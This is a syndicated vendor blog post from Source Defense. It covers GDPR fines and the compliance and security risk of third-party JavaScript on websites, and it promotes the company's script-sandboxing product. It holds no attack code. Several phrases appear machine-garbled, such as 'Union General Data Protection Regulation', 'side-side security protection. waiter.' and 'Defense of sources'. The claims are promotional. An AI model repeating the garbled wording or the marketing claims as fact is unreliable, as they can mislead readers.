GDPR and Website Data Leakage: A Complex Problem with a Simple Solution

By source of defense

Now in its fourth year, the Union General Data Protection Regulation (GDPR) is one of the strictest, most complex and confusing data privacy laws in the world. While this complexity initially meant accountability got off to a slow start, GDPR fines are now becoming more common and costly.

Over the past 12-18 months, some of the biggest brands in the world have suffered some of the toughest fines under GDPR:

  • Amazon – $824 million
  • WhatsApp – $224 million
  • Google Ireland – $99 million
  • Google – $66 million
  • Facebook – $66 million
  • H&M – $39 million
  • British Airways – $26 million

Many businesses remain confused about what is required of them under the GDPR. The GDPR applies when personal data is processed. Personal data is broadly defined in the GDPR to mean any information relating to an identifiable person is personal data (Section 4.1). For example, an email address, an IP address, a tracking cookie, an identification number and an “online identifier” are almost always personal data. But even hashed or encrypted email addresses are usually personal data, as they contain a unique identifier that can be linked to a person.

There is a natural tension between the letter of the law and business models that rely on customer data to improve customer experience and drive revenue. GDPR has been criticized for being too vague and difficult to interpret, especially for digital and marketing professionals on the front lines of digital business. The result has been uncertainty about what security and privacy protections to undertake, often leading to little or no action on GDPR controls.

One thing is certain, however: there is a real and material risk of non-compliance with the GDPR stemming from the digital supply chain of third parties on your websites.

Understand and deal with risk

Here’s what we know about the compliance risk posed by third-party and fourth-party digital procurement partners. Your websites probably include a dozen or more partners serving code (with your permission) to every new web user directly in their browser. As the website owner, you have a duty to ensure that all data collected both complies with data privacy requirements and is protected from potential cyber breaches. However, you have limited or no visibility into what the code these partners offer actually does. The reason behind this is manifold. First, the code itself is changing at a breakneck pace – with potentially thousands of changes occurring every year. Second, code is often dynamic, meaning it changes on the fly based on customer interactions with your site. And, most likely, you don’t have any tools in place to monitor, secure, and enforce compliance policies on that code.

This creates a gap in compliance assurance that could cost you dearly. Recent research by Source Defense and other parties has revealed that, in the normal course of their operations, many of these partner websites are capturing data without consent and, in some cases, transmitting that data. Take the recent case of Meta described in this blog post. This means you can be exposed to potentially massive GDPR compliance and data privacy fines just by going about your normal day-to-day operations.

The problem becomes even more pronounced when considering the risk of a security breach. Third-party and fourth-party scripts exponentially increase your client-side security risk. This is due to a major security flaw in JavaScript that gives all scripts, regardless of source, the same level of client-side control.

Web application logic – a combination of proprietary application logic and integration of third-party content and functionality – is loaded and executed client-side in the browser beyond side-side security protection. waiter. The code is downloaded dynamically from a remote server, which means it bypasses traditional security infrastructure, including website firewalls and web application firewalls. The vulnerability is easily exploitable and attacks using this vector occur in the hundreds every day. When an attack is successful, it leads not only to brand damage, significant security response costs, potential class action lawsuits – but also the potential for fines for data privacy non-compliance like the one suffered by British Airways.

Source Defense offers a simple, easy-to-use solution to the problem that benefits business stakeholders, security, and your governance, risk, and compliance efforts.

Source Defense’s sandboxing capability isolates all third-party JavaScript from the web page in real time. It relies on a set of fully automated, machine learning-assisted policies that control access and permissions for all third-party tools operating on a website (including the 4th and 5th parties they link into ). Suppose a script’s activity falls outside of what it is allowed to do. In this case, Source Defense maintains isolated user activity (thwarting an attack or enforcing data privacy/stopping a compliance breach) and sends a report to your teams, alerting them to third-party scripts violating their privacy policies. compliance or security.

It’s as close to data security and privacy as you’ll see in the market. And it’s a solution that takes security and GRC out of business decision-making.

Adopting Source Defense client-side security isn’t the same proposition you’re used to – it doesn’t require a lengthy proof-of-concept, major downtime for installation and tuning, or a team full of new resources to manage it – it’s simple, efficient and immediately beneficial to unite business, security and GRC units under a single risk management umbrella that protects the organization from harm.
Request a demo to learn more about how Source Defense can help you mitigate significant risk to your organization, prevent your partners from going overboard, and defend your business against client-side attacks.

The post office GDPR and Website Data Leakage:
A complex problem with a simple solution
appeared first on Defense of sources.

*** This is a syndicated blog from the Security Bloggers Network of Blog – Source Defense Written by [email protected]. Read the original post at:

Sherry J. Basler